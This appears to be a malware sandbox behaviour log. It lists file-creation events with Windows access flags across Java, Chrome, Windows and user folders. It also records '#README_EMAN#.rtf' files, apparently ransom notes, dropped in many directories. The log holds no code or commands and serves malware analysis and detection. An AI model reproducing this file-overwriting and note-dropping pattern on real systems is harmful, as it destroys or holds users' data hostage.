| Create | C:\Program Files\Java\jre1.8.0_131\lib\flavormap.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaTypewriterRegular.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaSansRegular.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\zipfs.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\javafx.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fontconfig.properties.src | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\cursors.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\invalid32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaTypewriterBold.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\jfr\default.jfc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightDemiItalic.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\jce.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_MoveNoDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightRegular.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\server\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\logging.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\meta-index | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\psfontj2d.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\amd64\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\security\US_export_policy.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\cmm\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_CopyDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\security\java.policy | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Microsoft Office 15\alfred.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_MoveDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\management\management.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\management\jmxremote.access | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\management\snmp.acl.template | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\release | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_LinkDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fonts\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\databases\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\Genko_1.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\security\blacklisted.certs | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\resources.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\jfr\profile.jfc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\elog_460F9943EA70F103.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\jfxswt.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\jvm.hprof.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Mail\en-US\WinMail.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\cQep-2gcU8N-eLTI1k\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\security\blacklist | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\LICENSE | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Program Files\Windows Journal\Journal.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Program Files\Windows Journal\Templates\Seyes.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\V_-s9qc7fmZDb\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\2M-Nd j92CbW7ShqCq.xls | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\uTLPAIPSplyVaoV88\DHBFRkC0Y1s_1InoiwZ.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\tzmappings | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Portable Devices\restaurant.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\default_apps\external_extensions.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\MSBuild\expenditurevincenttablet.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\Memo.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Mail\wabmig.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\_t6aWhRfJ2C7a_e5.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\V_-s9qc7fmZDb\-omfRXhku4HtqHef7\k-jt3_fF8Y22f3ge\FqTQKxshtz5\r4_0oc9EnjRh.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\javacpl.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\chrome.dll.sig | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\psfont.properties.ja | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\V_-s9qc7fmZDb\-omfRXhku4HtqHef7\k-jt3_fF8Y22f3ge\FqTQKxshtz5\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\V_-s9qc7fmZDb\zHUFhJqrOM5gMx575z_\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\chrome_200_percent.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Mail\WinMail.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\chrome.exe.sig | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\security\local_policy.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\Welcome.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\pack200.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Extensions\external_extensions.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\icudtl.dat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\bn.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\net.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\management-agent.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\da.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\COPYRIGHT | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Mail\en-US\msoeres.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\security\java.security | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\THIRDPARTYLICENSEREADME-JAVAFX.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\cmm\sRGB.pf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\security\cacerts | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\README.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_pt_BR.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\fil.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\access-bridge-64.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Photo Viewer\ImagingDevices.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\sound.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\PDIALOG.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\Shorthand.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\Music.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Multimedia Platform\tones engaging.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\chrome_100_percent.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Installer\setup.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunmscapi.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\default_apps\drive.crx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\chrome_child.dll.sig | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Installer\chrmstp.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\am.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\default_apps\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Extensions\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\et.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\kn.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\elog_460F9943EA70F103.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\jfr\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\management\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaSansDemiBold.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\bg.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\security\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
